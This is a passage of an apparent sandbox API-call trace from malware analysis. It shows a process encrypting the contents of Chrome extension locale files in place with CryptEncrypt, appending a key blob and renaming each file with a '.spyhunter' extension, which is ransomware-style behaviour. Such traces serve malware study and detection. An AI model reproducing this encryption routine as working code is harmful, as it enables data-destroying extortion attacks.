out: lpBuffer=0x57f4bc*, lpNumberOfBytesWritten=0x57f47c*=0x4, lpOverlapped=0x0) returned 1 [0137.245] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f47c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f47c*=0x30, lpOverlapped=0x0) returned 1 [0137.246] CloseHandle (hObject=0x18c) returned 1 [0137.246] GetProcessHeap () returned 0x2c0000 [0137.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.246] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json.spyhunter") returned 165 [0137.246] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json.spyhunter")) returned 1 [0137.248] GetProcessHeap () returned 0x2c0000 [0137.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.248] GetProcessHeap () returned 0x2c0000 [0137.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.248] GetProcessHeap () returned 0x2c0000 [0137.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc8420 | out: hHeap=0x2c0000) returned 1 [0137.249] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f4b8 | out: pbBuffer=0x57f4b8) returned 1 [0137.249] GetProcessHeap () returned 0x2c0000 [0137.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.249] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f4b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f4b0*=0x30) returned 1 [0137.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.250] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json") returned 155 [0137.250] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.250] GetProcessHeap () returned 0x2c0000 [0137.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.250] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f474, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f474*=0x299, lpOverlapped=0x0) returned 1 [0137.251] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xfffffd67, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.251] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x299, lpNumberOfBytesWritten=0x57f474, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f474*=0x299, lpOverlapped=0x0) returned 1 [0137.252] GetProcessHeap () returned 0x2c0000 [0137.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.252] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.252] WriteFile (in: hFile=0x18c, lpBuffer=0x57f4b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f474, lpOverlapped=0x0 | out: lpBuffer=0x57f4b4*, lpNumberOfBytesWritten=0x57f474*=0x4, lpOverlapped=0x0) returned 1 [0137.252] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f474, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f474*=0x30, lpOverlapped=0x0) returned 1 [0137.252] CloseHandle (hObject=0x18c) returned 1 [0137.252] GetProcessHeap () returned 0x2c0000 [0137.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.252] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json.spyhunter") returned 165 [0137.252] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json.spyhunter")) returned 1 [0137.253] GetProcessHeap () returned 0x2c0000 [0137.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.253] GetProcessHeap () returned 0x2c0000 [0137.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.253] GetProcessHeap () returned 0x2c0000 [0137.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc8110 | out: hHeap=0x2c0000) returned 1 [0137.255] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f4b0 | out: pbBuffer=0x57f4b0) returned 1 [0137.255] GetProcessHeap () returned 0x2c0000 [0137.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.255] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f4a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f4a8*=0x30) returned 1 [0137.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.255] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json") returned 155 [0137.255] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.255] GetProcessHeap () returned 0x2c0000 [0137.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.255] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f46c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f46c*=0xc6, lpOverlapped=0x0) returned 1 [0137.256] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff3a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.256] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xc6, lpNumberOfBytesWritten=0x57f46c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f46c*=0xc6, lpOverlapped=0x0) returned 1 [0137.256] GetProcessHeap () returned 0x2c0000 [0137.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.256] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.257] WriteFile (in: hFile=0x18c, lpBuffer=0x57f4ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f46c, lpOverlapped=0x0 | out: lpBuffer=0x57f4ac*, lpNumberOfBytesWritten=0x57f46c*=0x4, lpOverlapped=0x0) returned 1 [0137.257] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f46c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f46c*=0x30, lpOverlapped=0x0) returned 1 [0137.257] CloseHandle (hObject=0x18c) returned 1 [0137.257] GetProcessHeap () returned 0x2c0000 [0137.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.257] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json.spyhunter") returned 165 [0137.257] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json.spyhunter")) returned 1 [0137.257] GetProcessHeap () returned 0x2c0000 [0137.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.258] GetProcessHeap () returned 0x2c0000 [0137.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.258] GetProcessHeap () returned 0x2c0000 [0137.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc7e00 | out: hHeap=0x2c0000) returned 1 [0137.259] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f4a8 | out: pbBuffer=0x57f4a8) returned 1 [0137.259] GetProcessHeap () returned 0x2c0000 [0137.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.259] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f4a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f4a0*=0x30) returned 1 [0137.259] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.260] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json") returned 155 [0137.260] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.260] GetProcessHeap () returned 0x2c0000 [0137.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.260] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f464, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f464*=0xc8, lpOverlapped=0x0) returned 1 [0137.261] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.261] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xc8, lpNumberOfBytesWritten=0x57f464, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f464*=0xc8, lpOverlapped=0x0) returned 1 [0137.261] GetProcessHeap () returned 0x2c0000 [0137.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.261] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.261] WriteFile (in: hFile=0x18c, lpBuffer=0x57f4a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f464, lpOverlapped=0x0 | out: lpBuffer=0x57f4a4*, lpNumberOfBytesWritten=0x57f464*=0x4, lpOverlapped=0x0) returned 1 [0137.261] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f464, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f464*=0x30, lpOverlapped=0x0) returned 1 [0137.261] CloseHandle (hObject=0x18c) returned 1 [0137.261] GetProcessHeap () returned 0x2c0000 [0137.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.261] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json.spyhunter") returned 165 [0137.261] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json.spyhunter")) returned 1 [0137.262] GetProcessHeap () returned 0x2c0000 [0137.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.262] GetProcessHeap () returned 0x2c0000 [0137.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.262] GetProcessHeap () returned 0x2c0000 [0137.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc7af0 | out: hHeap=0x2c0000) returned 1 [0137.263] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f4a0 | out: pbBuffer=0x57f4a0) returned 1 [0137.263] GetProcessHeap () returned 0x2c0000 [0137.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.263] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f498*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f498*=0x30) returned 1 [0137.264] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.264] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json") returned 155 [0137.264] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.264] GetProcessHeap () returned 0x2c0000 [0137.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.264] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f45c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f45c*=0x13e, lpOverlapped=0x0) returned 1 [0137.265] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xfffffec2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.265] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x57f45c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f45c*=0x13e, lpOverlapped=0x0) returned 1 [0137.265] GetProcessHeap () returned 0x2c0000 [0137.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.265] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.265] WriteFile (in: hFile=0x18c, lpBuffer=0x57f49c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f45c, lpOverlapped=0x0 | out: lpBuffer=0x57f49c*, lpNumberOfBytesWritten=0x57f45c*=0x4, lpOverlapped=0x0) returned 1 [0137.265] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f45c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f45c*=0x30, lpOverlapped=0x0) returned 1 [0137.266] CloseHandle (hObject=0x18c) returned 1 [0137.266] GetProcessHeap () returned 0x2c0000 [0137.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.266] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json.spyhunter") returned 165 [0137.266] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json.spyhunter")) returned 1 [0137.266] GetProcessHeap () returned 0x2c0000 [0137.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.266] GetProcessHeap () returned 0x2c0000 [0137.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.267] GetProcessHeap () returned 0x2c0000 [0137.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc77e0 | out: hHeap=0x2c0000) returned 1 [0137.268] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f498 | out: pbBuffer=0x57f498) returned 1 [0137.268] GetProcessHeap () returned 0x2c0000 [0137.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.268] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f490*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f490*=0x30) returned 1 [0137.268] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.268] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json") returned 155 [0137.268] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.268] GetProcessHeap () returned 0x2c0000 [0137.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.269] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f454, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f454*=0x11e, lpOverlapped=0x0) returned 1 [0137.269] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xfffffee2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.269] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x11e, lpNumberOfBytesWritten=0x57f454, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f454*=0x11e, lpOverlapped=0x0) returned 1 [0137.270] GetProcessHeap () returned 0x2c0000 [0137.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.270] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.270] WriteFile (in: hFile=0x18c, lpBuffer=0x57f494*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f454, lpOverlapped=0x0 | out: lpBuffer=0x57f494*, lpNumberOfBytesWritten=0x57f454*=0x4, lpOverlapped=0x0) returned 1 [0137.270] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f454, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f454*=0x30, lpOverlapped=0x0) returned 1 [0137.270] CloseHandle (hObject=0x18c) returned 1 [0137.270] GetProcessHeap () returned 0x2c0000 [0137.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.270] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json.spyhunter") returned 165 [0137.270] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 